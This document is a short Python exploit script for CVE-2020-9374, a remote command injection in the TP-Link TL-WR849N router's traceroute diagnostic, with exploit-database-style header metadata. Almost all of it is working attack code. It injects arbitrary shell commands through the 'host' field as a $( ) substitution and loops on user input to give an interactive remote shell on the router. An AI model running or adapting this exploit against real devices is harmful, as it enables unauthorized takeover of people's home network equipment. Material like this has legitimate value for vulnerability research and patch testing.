TP LINK TL-WR849N - Remote Code Execution - CVE-2020-9374

1. # Exploit Title: TP LINK TL-WR849N - Remote Code Execution
2. # Date: 2019-11-20
3. # Exploit Author: Elber Tavares
4. # Vendor Homepage: https://www.tp-link.com/
5. # Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
6. # Version: TL-WR849N 0.9.1 4.16
7. # Tested on: linux, windows
8. # CVE : CVE-2020-9374
9.  
10. import requests
11.  
12. def output(headers,cookies):
13.     url = 'http://192.168.0.1/cgi?1'
14.     data = ''
15.     data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
16.     data += 'diagnosticsState\x0d\x0a'
17.     data += 'X_TP_HopSeq\x0d\x0a'
18.     data += 'X_TP_Result\x0d\x0a'
19.     r = requests.post(url,data=data,headers=headers,cookies=cookies)
20.     saida = r.text
21.     filtro = saida.replace(': Name or service not known','')
22.     filtro = filtro.replace('[0,0,0,0,0,0]0','')
23.     filtro = filtro.replace('diagnosticsState=','')
24.     filtro = filtro.replace('X_TP_HopSeq=0','')
25.     filtro = filtro.replace('X_TP_Result=','')
26.     print(filtro[:-8])
27.  
28. def aceppt(headers,cookies):
29.     url = 'http://192.168.0.1/cgi?7'
30.     data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'
31.     r = requests.post(url,data=data,headers=headers,cookies=cookies)
32.     output(headers,cookies)
33.    
34. def inject(command,headers,cookies):
35.     url = 'http://192.168.0.1/cgi?2'
36.     data = ''
37.     data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a'
38.     data += 'maxHopCount=20\x0d\x0a'
39.     data += 'timeout=5\x0d\x0a'
40.     data += 'numberOfTries=1\x0d\x0a'
41.     data += 'host="$('+command+')"\x0d\x0a'
42.     data += 'dataBlockSize=64\x0d\x0a'
43.     data += 'X_TP_ConnName=ewan_pppoe\x0d\x0a'
44.     data += 'diagnosticsState=Requested\x0d\x0a'
45.     data += 'X_TP_HopSeq=0\x0d\x0a'
46.     r = requests.post(url,data=data,headers=headers,cookies=cookies)
47.     aceppt(headers,cookies)
48.  
49. def main():
50.     cookies = {“Authorization”: “Basic REPLACEBASE64AUTH”}
51.     headers = {'Content-Type': 'text/plain',
52.     'Referer': 'http://192.168.0.1/mainFrame.htm'}
53.     while True:
54.         command = input('$ ')
55.         inject(command,headers,cookies)
56.  
57. main()